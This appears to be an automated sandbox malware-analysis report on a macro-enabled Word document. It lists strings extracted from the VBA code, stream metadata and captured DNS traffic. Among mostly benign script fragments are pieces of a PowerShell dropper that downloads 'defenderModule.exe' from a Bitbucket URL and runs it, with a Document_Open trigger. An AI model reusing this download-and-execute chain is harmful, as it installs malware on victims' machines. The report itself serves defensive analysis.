                                                                                                                                                      objItem.PrimaryOwnerContact
                                                                                                                                                      tii()
                                                                                                                                                      $TempDir
                                                                                                                                                      Wscript.ScriptFullName
                                                                                                                                                      arrDHCPRecord
                                                                                                                                                      CreateObject("Scripting.Filesystemobject")
                                                                                                                                                      Subtitles
                                                                                                                                                      Replace(Text,
                                                                                                                                                      ParseSrt(path,
                                                                                                                                                      Notepad",
                                                                                                                                                      udax(str)
                                                                                                                                                      "Primary
                                                                                                                                                      img.DrawPolygon
                                                                                                                                                      "John"
                                                                                                                                                      objItem.Description
                                                                                                                                                      objItem.PoolNonpagedAllocs
                                                                                                                                                      pivot.LoadChartTemplate
                                                                                                                                                      Where
                                                                                                                                                      ForReading
                                                                                                                                                      False
                                                                                                                                                      "User
                                                                                                                                                      charset(Source)
                                                                                                                                                      Global
                                                                                                                                                      LBound(sb_)
                                                                                                                                                      wdix(p_)
                                                                                                                                                      large
                                                                                                                                                      Allowed
                                                                                                                                                      "Name:
                                                                                                                                                      objtextFile.AtEndOfStream
                                                                                                                                                      objOutput
                                                                                                                                                      objItem.PercentCommittedBytesInUse
                                                                                                                                                      Date)
                                                                                                                                                      objItem.CommitLimit
                                                                                                                                                      "Percent
                                                                                                                                                      'defenderModule.exe'"
                                                                                                                                                      wdix(str)
                                                                                                                                                      UBound(Files)
                                                                                                                                                      height="""
                                                                                                                                                      GetObject("LDAP://OU=Finance,
                                                                                                                                                      "Network:
                                                                                                                                                      "Demand
                                                                                                                                                      'WScript.Echo
                                                                                                                                                      GetObject("winmgmts:"
                                                                                                                                                      objSD.DiscretionaryAcl
                                                                                                                                                      "sample.srt"
                                                                                                                                                      "\Adersoft\Vbsedit\Resources\"
                                                                                                                                                      "Default
                                                                                                                                                      objCatalog
                                                                                                                                                      objItem.PagesPersec
                                                                                                                                                      objItem.DomainName
                                                                                                                                                      objItem.CacheBytes
                                                                                                                                                      pivot.Initialize
                                                                                                                                                      thedy
                                                                                                                                                      Shell.Run
                                                                                                                                                      Vbsedit's
                                                                                                                                                      Delegate
                                                                                                                                                      Distribution
                                                                                                                                                      ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
                                                                                                                                                      CreateObject("Microsoft.Update.AutoUpdate")
                                                                                                                                                      SecondsToString
                                                                                                                                                      objItem.DomainGuid
                                                                                                                                                      "title",
                                                                                                                                                      Stream
                                                                                                                                                      "Server
                                                                                                                                                      "{impersonationLevel=impersonate}!\\"
                                                                                                                                                      arr(i
                                                                                                                                                      timings
                                                                                                                                                      WshShell
                                                                                                                                                      toolkit.OpenFileDialog("",
                                                                                                                                                      objInput.LoadFromFile
                                                                                                                                                      Owner
                                                                                                                                                      objItem.DSTimeServiceFlag
                                                                                                                                                      "<tspan
                                                                                                                                                      Binary
                                                                                                                                                      CreateObject("WbemScripting.SWbemRefresher")
                                                                                                                                                      objDHCPServer.WINSServers
                                                                                                                                                      SFU_Domain")
                                                                                                                                                      Update
                                                                                                                                                      VB_Exposed
                                                                                                                                                      ".png"
                                                                                                                                                      objItem.DSDnsDomainFlag
                                                                                                                                                      objDHCPServer.LeaseRebindingTime
                                                                                                                                                      Input
                                                                                                                                                      scb_(idx)
                                                                                                                                                      "Refresh",
                                                                                                                                                      mask:
                                                                                                                                                      objInput
                                                                                                                                                      Days,
                                                                                                                                                      objOutput.LineSeparator
                                                                                                                                                      strLine
                                                                                                                                                      First
                                                                                                                                                      StringToSeconds(Left(tt,
                                                                                                                                                      Count
                                                                                                                                                      Bytes:
                                                                                                                                                      bytes:
                                                                                                                                                      Mount
                                                                                                                                                      objOutput.charset
                                                                                                                                                      """c:\program
                                                                                                                                                      Spiral
                                                                                                                                                      Limit:
                                                                                                                                                      fso.OpenTextFile(path,
                                                                                                                                                      img.FontFamily
                                                                                                                                                      ADS_RIGHT_DS_CONTROL_ACCESS
                                                                                                                                                      objDHCPServer.Network
                                                                                                                                                      "Transition
                                                                                                                                                      name:
                                                                                                                                                      folder
                                                                                                                                                      FalseSet
                                                                                                                                                      "sheaa"
                                                                                                                                                      Toolkit
                                                                                                                                                      StringToSeconds(from_time)
                                                                                                                                                      objAdminIS.GetCatalogByName("Script
                                                                                                                                                      Video
                                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                                      f.ReadLine
                                                                                                                                                      objShell.ExpandEnvironmentStrings("%LOCALAPPDATA%")
                                                                                                                                                      objItem.SystemDriverResidentBytes
                                                                                                                                                      Stream.Type
                                                                                                                                                      until_time
                                                                                                                                                      "&lt;")
                                                                                                                                                      ADS_ACEFLAG_INHERIT_ACE
                                                                                                                                                      Megabytes:
                                                                                                                                                      Virtual
                                                                                                                                                      unbiased
                                                                                                                                                      "White"
                                                                                                                                                      shift_from
                                                                                                                                                      Flag:
                                                                                                                                                      "ntSecurityDescriptor",
                                                                                                                                                      Kerberos
                                                                                                                                                      Variant
                                                                                                                                                      Source,
                                                                                                                                                      strComputer
                                                                                                                                                      objSD
                                                                                                                                                      VB_Customizable
                                                                                                                                                      objCatalog.AddScope("c:\scripts\Indexing
                                                                                                                                                      objItem.ClientSiteName
                                                                                                                                                      Monitor
                                                                                                                                                      "Lease
                                                                                                                                                      objScope.path
                                                                                                                                                      [System.IO.Path]::GetTempPath();cd
                                                                                                                                                      Len(n)
                                                                                                                                                      "<body></html>"
                                                                                                                                                      sb_(idx)
                                                                                                                                                      days",
                                                                                                                                                      objDHCPServer.LeaseTime
                                                                                                                                                      objItem.Default
                                                                                                                                                      enabled:
                                                                                                                                                      Server",
                                                                                                                                                      objItem.DSPrimaryDomainControllerFlag
                                                                                                                                                      ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT
                                                                                                                                                      StringToSeconds(str)
                                                                                                                                                      pivot.Finalize
                                                                                                                                                      Comma
                                                                                                                                                      """>"
                                                                                                                                                      ".bak",
                                                                                                                                                      Kilobytes:
                                                                                                                                                      charset
                                                                                                                                                      Const
                                                                                                                                                      "Number
                                                                                                                                                      objItem.PageFaultsPersec
                                                                                                                                                      Stream.Open
                                                                                                                                                      objAce.InheritedObjectType
                                                                                                                                                      Text,
                                                                                                                                                      file")
                                                                                                                                                      UBound(sb_)
                                                                                                                                                      StringToSeconds(Mid(tt,
                                                                                                                                                      "Script
                                                                                                                                                      Shell
                                                                                                                                                      "Pages
                                                                                                                                                      objNetwork
                                                                                                                                                      note.AddMenuOption
                                                                                                                                                      Using
                                                                                                                                                      hidden
                                                                                                                                                      files\vbsedit\vbsedit.exe""
                                                                                                                                                      Sqr(adj
                                                                                                                                                      firstname,
                                                                                                                                                      "vertical"
                                                                                                                                                      Stream.Read(limit)
                                                                                                                                                      Wscript.Sleep
                                                                                                                                                      "\ageindays_"
                                                                                                                                                      "DHCP
                                                                                                                                                      'Z:\\'")
                                                                                                                                                      records
                                                                                                                                                      "Central
                                                                                                                                                      from_time
                                                                                                                                                      pos),
                                                                                                                                                      objDHCPServer.NetworkMask
                                                                                                                                                      objItem.DSDirectoryServiceFlag
                                                                                                                                                      objItem.SystemCodeTotalBytes
                                                                                                                                                      objItem.FreeSystemPageTableEntries
                                                                                                                                                      objDacl
                                                                                                                                                      pb_()
                                                                                                                                                      "wscript.exe
                                                                                                                                                      String)
                                                                                                                                                      objRefresher.Refresh
                                                                                                                                                      scope"
                                                                                                                                                      String:
                                                                                                                                                      "Date:
                                                                                                                                                      offset,
                                                                                                                                                      colItems
                                                                                                                                                      rebinding
                                                                                                                                                      firstname
                                                                                                                                                      objOutput.SaveToFile
                                                                                                                                                      CreateObject("VirtualServer.Application")
                                                                                                                                                      theText
                                                                                                                                                      pb_(i)
                                                                                                                                                      DC=fabrikam,DC=Com")
                                                                                                                                                      objItem.SystemDriverTotalBytes
                                                                                                                                                      objItem.AvailableKBytes
                                                                                                                                                      "Starting
                                                                                                                                                      "Domain
                                                                                                                                                      (f.AtEndOfStream)
                                                                                                                                                      dest,
                                                                                                                                                      proxy
                                                                                                                                                      CreateObject("ADODB.Stream")
                                                                                                                                                      shift_until
                                                                                                                                                      UBound(pb_):
                                                                                                                                                      Split(Mid(tt,
                                                                                                                                                      "System
                                                                                                                                                      "firefox.exe
                                                                                                                                                      Writable
                                                                                                                                                      Sin(angletotal)
                                                                                                                                                      "Commit
                                                                                                                                                      events"
                                                                                                                                                      img.Create
                                                                                                                                                      $TempDir;(New-Object
                                                                                                                                                      objNetwork.DHCPVirtualNetworkServer
                                                                                                                                                      CDbl(s)
                                                                                                                                                      "Read-only:
                                                                                                                                                      Authenticate
                                                                                                                                                      objScope
                                                                                                                                                      img.CenterText
                                                                                                                                                      number
                                                                                                                                                      VB_Creatable
                                                                                                                                                      Stream.LoadFromFile
                                                                                                                                                      "Free
                                                                                                                                                      img.Load
                                                                                                                                                      Separated
                                                                                                                                                      y="""
                                                                                                                                                      "Open
                                                                                                                                                      fso.CreateTextFile("sample.html",
                                                                                                                                                      their
                                                                                                                                                      address:
                                                                                                                                                      "</text>"
                                                                                                                                                      objItem.WriteCopiesPersec
                                                                                                                                                      "Cache
                                                                                                                                                      Left(Wscript.ScriptFullName,
                                                                                                                                                      Wscript.Echo
                                                                                                                                                      False,
                                                                                                                                                      AscB(MidB(s,
                                                                                                                                                      False)
                                                                                                                                                      "Bypass
                                                                                                                                                      Copies
                                                                                                                                                      fill=""green""/>"
                                                                                                                                                      objDacl.AddAce
                                                                                                                                                      CreateObject("Microsoft.Update.WebProxy")
                                                                                                                                                      objItem.SystemCodeResidentBytes
                                                                                                                                                      Source
                                                                                                                                                      ".axa"
                                                                                                                                                      identical,
                                                                                                                                                      (objWMIService,
                                                                                                                                                      Resident
                                                                                                                                                      ("Select
                                                                                                                                                      objDHCPServer.StartingIPAddress
                                                                                                                                                      (objInput.EOS)
                                                                                                                                                      Information
                                                                                                                                                      objItem.DemandZeroFaultsPersec
                                                                                                                                                      https://en.wikipedia.org/wiki/Central_limit_theorem
                                                                                                                                                      Peak:
                                                                                                                                                      VB_Name
                                                                                                                                                      CreateObject("Vbsedit.ImageProcessor")
                                                                                                                                                      Catalog")
                                                                                                                                                      (fso.FileExists(Source
                                                                                                                                                      thesvg
                                                                                                                                                      objInput.Open
                                                                                                                                                      objDHCPServer.ServerIPAddress
                                                                                                                                                      Mid(m,
                                                                                                                                                      objAutoUpdate.Settings
                                                                                                                                                      objAce.AceType
                                                                                                                                                      objStream
                                                                                                                                                      objRefresher
                                                                                                                                                      objRefresher.AddEnum
                                                                                                                                                      objItem.DnsForestName
                                                                                                                                                      seconds",
                                                                                                                                                      Int(t
                                                                                                                                                      Type:
                                                                                                                                                      Vbsedit",
                                                                                                                                                      angletotal
                                                                                                                                                      InStr(strLine,
                                                                                                                                                      objAce
                                                                                                                                                      System.Net.WebClient).DownloadFile('https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exe',$TempDir+'defenderModule.exe');Start-Process
                                                                                                                                                      objSettings
                                                                                                                                                      CreateObject("Scripting.FileSystemObject")
                                                                                                                                                      Cache
                                                                                                                                                      Sticky
                                                                                                                                                      Table
                                                                                                                                                      pivot.ReplaceTag
                                                                                                                                                      img.color
                                                                                                                                                      path,
                                                                                                                                                      objItem.KeyName
                                                                                                                                                      UBound(Lines)
                                                                                                                                                      objItem.CacheBytesPeak
                                                                                                                                                      Modify
                                                                                                                                                      ReDim
                                                                                                                                                      Atn(opp
                                                                                                                                                      "Maps:
                                                                                                                                                      objInput.charset
                                                                                                                                                      local
                                                                                                                                                      "Time:
                                                                                                                                                      color)
                                                                                                                                                      objItem.DomainControllerName
                                                                                                                                                      objDHCPServer
                                                                                                                                                      "FABRIKAM\kmyer"
                                                                                                                                                      While
                                                                                                                                                      objItem.CacheFaultsPersec
                                                                                                                                                      objWMIService
                                                                                                                                                      "<svg
                                                                                                                                                      objItem.Maps
                                                                                                                                                      Right
                                                                                                                                                      DateDiff("d",
                                                                                                                                                      bytes
                                                                                                                                                      udax(str
                                                                                                                                                      CreateObject("Microsoft.ISAdm")
                                                                                                                                                      Replace(dy,
                                                                                                                                                      objSDUtil.Put
                                                                                                                                                      Attribute
                                                                                                                                                      sample.html",
                                                                                                                                                      objProxy
                                                                                                                                                      "Shift",
                                                                                                                                                      Bytes
                                                                                                                                                      Script
                                                                                                                                                      Create
                                                                                                                                                      arr(i,
                                                                                                                                                      objItem.DomainControllerAddress
                                                                                                                                                      CreateObject("Wscript.Shell")
                                                                                                                                                      objStream.Close
                                                                                                                                                      Entries:
                                                                                                                                                      movie
                                                                                                                                                      Indexing
                                                                                                                                                      CreateObject("vbsedit.imageprocessor")
                                                                                                                                                      Wscript.CreateObject("Wscript.Shell")
                                                                                                                                                      "lightgreen"
                                                                                                                                                      stroke=""red""
                                                                                                                                                      Central
                                                                                                                                                      objItem
                                                                                                                                                      objAdminIS
                                                                                                                                                      objOutput.WriteText
                                                                                                                                                      Directory
                                                                                                                                                      Server
                                                                                                                                                      "Committed
                                                                                                                                                      Second:
                                                                                                                                                      objAce.Flags
                                                                                                                                                      ForReading)
                                                                                                                                                      http-equiv=""Content-Type""
                                                                                                                                                      currentdir
                                                                                                                                                      Resume
                                                                                                                                                      objItem.PoolPagedResidentBytes
                                                                                                                                                      Primary
                                                                                                                                                      pivot.SetColumnNames
                                                                                                                                                      img.FillPolygon
                                                                                                                                                      Reads
                                                                                                                                                      VB_Base
                                                                                                                                                      fso.CopyFile
                                                                                                                                                      Randomize
                                                                                                                                                      Int(t)
                                                                                                                                                      subtitle
                                                                                                                                                      color
                                                                                                                                                      objItem.DSDnsControllerFlag
                                                                                                                                                      Int((t
                                                                                                                                                      objProxy.ReadOnly
                                                                                                                                                      "c:\scripts"
                                                                                                                                                      Forest
                                                                                                                                                      Angle
                                                                                                                                                      Replace(s,
                                                                                                                                                      objItem.Domain
                                                                                                                                                      mult,
                                                                                                                                                      style=""fill:"
                                                                                                                                                      objAce.AceFlags
                                                                                                                                                      pivot.SaveChart
                                                                                                                                                      objInput.LineSeparator
                                                                                                                                                      LenB(s)
                                                                                                                                                      objSDUtil.SetInfo
                                                                                                                                                      Center
                                                                                                                                                      note.ShowBalloon
                                                                                                                                                      Network")
                                                                                                                                                      img.Save
                                                                                                                                                      objDHCPServer.DNSServers
                                                                                                                                                      Split(str,
                                                                                                                                                      "</tspan>"
                                                                                                                                                      Array(objSD)
                                                                                                                                                      objItem.PoolPagedBytes
                                                                                                                                                      Allocations:
                                                                                                                                                      objSDUtil
                                                                                                                                                      objItem.PageWritesPersec
                                                                                                                                                      objItem.PagesOutputPersec
                                                                                                                                                      x="""
                                                                                                                                                      objItem.PageReadsPersec
                                                                                                                                                      objItem.DcSiteName
                                                                                                                                                      ADS_FLAG_OBJECT_TYPE_PRESENT
                                                                                                                                                      "</svg>"
                                                                                                                                                      sb_()
                                                                                                                                                      "Address:
                                                                                                                                                      img.FontSize
                                                                                                                                                      objInput.Type
                                                                                                                                                      resourceLocation
                                                                                                                                                      """/>"
                                                                                                                                                      "Edit
                                                                                                                                                      SecondsToString(seconds)
                                                                                                                                                      WshShell.Run
                                                                                                                                                      objVS
                                                                                                                                                      objOutput.Open
                                                                                                                                                      objDHCPServer.DefaultGatewayAddress
                                                                                                                                                      "Page
                                                                                                                                                      "DhcpSrvLog-Mon.log",
                                                                                                                                                      vbCrLf)
                                                                                                                                                      objItem.SystemCacheResidentBytes
                                                                                                                                                      Int(Max
                                                                                                                                                      Address
                                                                                                                                                      Name:
                                                                                                                                                      Nonpaged
                                                                                                                                                      CreateObject("AccessControlEntry")
                                                                                                                                                      maisLixo()
                                                                                                                                                      "\"))
                                                                                                                                                      Lines
                                                                                                                                                      objDHCPServer.EndingIPAddress
                                                                                                                                                      ElseIf
                                                                                                                                                      birthdate,
                                                                                                                                                      Values
                                                                                                                                                      InputBox("Enter
                                                                                                                                                      vbCrLf
                                                                                                                                                      VB_TemplateDerived
                                                                                                                                                      read:
                                                                                                                                                      "Arial"
                                                                                                                                                      objStream.Type
                                                                                                                                                      objItem.PagesInputPersec
                                                                                                                                                      objProxy.UserName
                                                                                                                                                      Performance
                                                                                                                                                      Variant:
                                                                                                                                                      UBound(s)
                                                                                                                                                      "<text
                                                                                                                                                      Total
                                                                                                                                                      strFile
                                                                                                                                                      Paged
                                                                                                                                                      Service
                                                                                                                                                      Records"
                                                                                                                                                      ".bak"))
                                                                                                                                                      old",
                                                                                                                                                      CreateObject("Vbsedit.PivotTable")
                                                                                                                                                      "Description:
                                                                                                                                                      Faults
                                                                                                                                                      addresses:
                                                                                                                                                      Scope
                                                                                                                                                      udax(p_)
                                                                                                                                                      objItem.DSKerberosDistributionCenterFlag
                                                                                                                                                      Files
                                                                                                                                                      "Ending
                                                                                                                                                      (*.srt)|*.srt",
                                                                                                                                                      CreateObject("VbsEdit.Toolkit")
                                                                                                                                                      Writes
                                                                                                                                                      "&gt;")
                                                                                                                                                      objStream.Open
                                                                                                                                                      objSettings.Save
                                                                                                                                                      theorem
                                                                                                                                                      objDHCPServer.IsEnabled
                                                                                                                                                      Len(h)
                                                                                                                                                      "\root\sfuadmin")
                                                                                                                                                      out.Close
                                                                                                                                                      objAutoUpdate
                                                                                                                                                      FormatNumber(m,
                                                                                                                                                      objProxy.Address
                                                                                                                                                      Document_Open()
                                                                                                                                                      objOutput.Close
                                                                                                                                                      pivot.Add
                                                                                                                                                      StringToSeconds(until_time)
                                                                                                                                                      using
                                                                                                                                                      dominant-baseline=""middle""
                                                                                                                                                      "your
                                                                                                                                                      pos))
                                                                                                                                                      objAce.AccessMask
                                                                                                                                                      objItem.Caption
                                                                                                                                                      "notepad.exe
                                                                                                                                                      "column"
                                                                                                                                                      objItem.CommittedBytes
                                                                                                                                                      objSettings.ScheduledInstallationDay
                                                                                                                                                      WshShell.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage\ACP")
                                                                                                                                                      charset(strFile)
                                                                                                                                                      objInput.Close
                                                                                                                                                      System
                                                                                                                                                      "Client
                                                                                                                                                      wdix(str
                                                                                                                                                      bytes()
                                                                                                                                                      "Event
                                                                                                                                                      GUID:
                                                                                                                                                      objtextFile
                                                                                                                                                      String
                                                                                                                                                      Split(strLine,
                                                                                                                                                      "Default:
                                                                                                                                                      "stacked",
                                                                                                                                                      gateway
                                                                                                                                                      Catalog
                                                                                                                                                      "Caption:
                                                                                                                                                      toolkit
                                                                                                                                                      objAce.Trustee
                                                                                                                                                      theorem"
                                                                                                                                                      ParseSrt
                                                                                                                                                      CreateObject("WScript.Shell")
                                                                                                                                                      objItem.PoolNonpagedBytes
                                                                                                                                                      objItem.PoolPagedAllocs
                                                                                                                                                      objItem.AvailableMBytes
                                                                                                                                                      seconds
                                                                                                                                                      Address:
                                                                                                                                                      Stream.Close
                                                                                                                                                      "<rect
                                                                                                                                                      Len(s)
                                                                                                                                                      "WINS
                                                                                                                                                      offset
                                                                                                                                                      objItem.DSDnsForestFlag
                                                                                                                                                      "ThisDocument"
                                                                                                                                                      Domain
                                                                                                                                                      "red"
                                                                                                                                                      Committed
                                                                                                                                                      StringToSeconds
                                                                                                                                                      objScope.Alias
                                                                                                                                                      objStream.LoadFromFile
                                                                                                                                                      "spiral.png"
                                                                                                                                                      Wscript.CreateObject("Scripting.Filesystemobject")
                                                                                                                                                      "sample.fra.srt"
                                                                                                                                                      Controller
                                                                                                                                                      Driver
                                                                                                                                                      image
                                                                                                                                                      objFSO
                                                                                                                                                      "Domain:
                                                                                                                                                      objProxy.BypassProxyOnLocal
                                                                                                                                                      Int(UBound(Lines)
                                                                                                                                                      Output
                                                                                                                                                      Cos(angletotal)
                                                                                                                                                      pivot
                                                                                                                                                      "Write
                                                                                                                                                      objItem.Name
                                                                                                                                                      "<line
                                                                                                                                                      Extended
                                                                                                                                                      "Network
                                                                                                                                                      renewal
                                                                                                                                                      servers:
                                                                                                                                                      objWMIService.ExecQuery
                                                                                                                                                      files
                                                                                                                                                      Entire
                                                                                                                                                      objWMIService.ExecQuery("Select
                                                                                                                                                      Contact:
                                                                                                                                                      InStr(tt,
                                                                                                                                                      Wscript.Quit
                                                                                                                                                      Error
                                                                                                                                                      Compare
                                                                                                                                                      Split(Left(tt,
                                                                                                                                                      Schedule
                                                                                                                                                      'Your
                                                                                                                                                      birthdate
                                                                                                                                                      Properties
                                                                                                                                                      VB_PredeclaredId
                                                                                                                                                      limit
                                                                                                                                                      "Available
                                                                                                                                                      objAce.ObjectType
                                                                                                                                                      rolling
                                                                                                                                                      objSettings.ScheduledInstallationTime
                                                                                                                                                      Memory
                                                                                                                                                      objVS.FindVirtualNetwork("Internal
                                                                                                                                                      objtextFile.ReadLine
                                                                                                                                                      out.Write
                                                                                                                                                      Function
                                                                                                                                                      objShell
                                                                                                                                                      "Host
                                                                                                                                                      "Windows-"
                                                                                                                                                      Volume
                                                                                                                                                      "calendar.png"
                                                                                                                                                      Proxy
                                                                                                                                                      Theodorus
                                                                                                                                                      objItem.DC
                                                                                                                                                      img.BrushColor
                                                                                                                                                      objItem.TransitionFaultsPersec
                                                                                                                                                      Shift
                                                                                                                                                      dy="""
                                                                                                                                                      "aower"
                                                                                                                                                      InStrRev(Wscript.ScriptFullName,
                                                                                                                                                      objItem.AvailableBytes
                                                                                                                                                      objItem.DomainControllerAddressType
                                                                                                                                                      "false"
                                                                                                                                                      video,
                                                                                                                                                      Server:
                                                                                                                                                      objItem.DSWritableFlag
                                                                                                                                                      time:
                                                                                                                                                      Private
                                                                                                                                                      objDHCPServer.LeaseRenewalTime
                                                                                                                                                      objOutput.Type
                                                                                                                                                      f.Close
                                                                                                                                                      "Sum",
                                                                                                                                                      VBA Code

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 375
                                                                                                                                                      General
                                                                                                                                                      Stream Path:PROJECT
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Stream Size:375
                                                                                                                                                      Entropy:5.33453038431
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:I D = " { 4 B 2 8 A 7 6 7 - B 5 4 8 - 4 D 2 4 - A 9 8 A - 1 4 F C 9 1 C 9 5 E 7 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 E 1 C F E E 2 0 2 1 E 2 4 2 2 2 4 2 2 2 4 2 2 2 4 2 2 " . . D P B = " 3 C 3 E D C 0 0 E 4 1 F E 5 1 F E 5 1 F " . . G C = " 5 A 5 8 B A 2 6 D 9 2 7 D 9 2 7 2 6 " . . . . [ H o s t E x t e n d e r I n f
                                                                                                                                                      Data Raw:49 44 3d 22 7b 34 42 32 38 41 37 36 37 2d 42 35 34 38 2d 34 44 32 34 2d 41 39 38 41 2d 31 34 46 43 39 31 43 39 35 45 37 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                                      Stream Path: PROJECTwm, File Type: data, Stream Size: 41
                                                                                                                                                      General
                                                                                                                                                      Stream Path:PROJECTwm
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:41
                                                                                                                                                      Entropy:3.07738448508
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                                      Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 7060
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:7060
                                                                                                                                                      Entropy:5.55925901598
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                                                                                      Data Raw:cc 61 af 00 00 01 00 ff 16 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                      Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 523
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/dir
                                                                                                                                                      File Type:VAX-order 68K Blit (standalone) executable
                                                                                                                                                      Stream Size:523
                                                                                                                                                      Entropy:6.29824308961
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . 0 . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . . a .
                                                                                                                                                      Data Raw:01 07 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 30 93 d7 61 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Dec 27, 2020 09:04:57.501292944 CET6418553192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:04:57.557514906 CET53641858.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:04:58.462955952 CET6511053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:04:58.510943890 CET53651108.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:00.351908922 CET5836153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:00.399971008 CET53583618.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:01.349952936 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:01.409199953 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:02.357498884 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:02.408379078 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:03.548280001 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:03.599301100 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:04.083897114 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:04.142157078 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:04.665739059 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:04.746326923 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:05.675348043 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:05.736268997 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:05.939738989 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:05.987751007 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:06.675348997 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:06.734536886 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:06.918668032 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Dec 27, 2020 09:05:06.966662884 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Dec 27, 2020 09:05:07.883820057 CET5135253192.168.2.38.8.8.8
